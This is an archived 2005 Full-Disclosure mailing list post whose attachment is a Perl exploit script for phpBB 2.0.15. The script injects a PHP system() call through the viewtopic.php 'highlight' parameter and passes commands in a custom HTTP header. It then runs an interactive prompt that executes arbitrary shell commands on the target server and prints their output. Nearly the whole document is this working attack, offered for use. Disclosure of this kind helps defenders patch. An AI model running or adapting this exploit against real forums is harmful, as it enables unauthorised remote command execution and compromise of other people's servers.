'[Full-disclosure] phpBB 2.0.15 exploit (w0op!)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] phpBB 2.0.15 exploit (w0op!)
From:       dab <dab () digitalsec ! net>
Date:       2005-06-29 23:44:24
Message-ID: Pine.LNX.4.63.0506300141470.29810 () fogheaven ! digitalsec ! net
[Download RAW message or body]

This is a MIME-formatted message.  If you see this text it means that your
E-mail software does not support MIME-formatted messages.


See attached file.

-- 

dab @ !dSR
http://www.digitalsec.net
-
["phpbb2_0_15.pl" (text/plain)]

#!/usr/bin/perl 
# Wed Jun 29 19:08:04 CEST 2005 dab@digitalsec.net
#
# phpBB 2.0.15 -re-bug in viewtopic.php
# The complete Open Source Development with CVS: GNU General Public License
# Book on using CVS effectively  <---------  cvs, is also GPL
# or http://www.google.es/search?q=programming+howto
# 
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
# 
# 
# Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1
# You can start typing commands.
# Tested in BSD. Theo.. it works!
#
# !dSR: que todos los hackers digan YO!!
#
# 
 

use strict;
use IO::Socket;

unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }

$ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;
my ($server, $port) = split (/:/,$1);
$port   = 80 unless defined($port);
$server  = $1 unless defined($server);
my ($url, $command) = $2;

print "$server - $port - $url\n";

while () {
		print "phpBB2.0.15> ";
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send {
    my $ok	=	0;
    my $cmd	= "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
    my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
					"Host: $server\nPHP: $cmd\n\n\n\n";
    my $socket = IO::Socket::INET->new(PeerAddr => $server,
				PeerPort => $port,
				Proto    => "tcp",
				Type     => SOCK_STREAM)
				or die "can't connect to: $server : $@\n";
	print $socket $string;
	while(<$socket>) {
		if (/#PHPBBEXPLOIT#/) {
				close($socket) and last if $ok eq 2;
				$ok++;
				next;
		}
		print if $ok eq "1";
	}
}
exit 0;



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic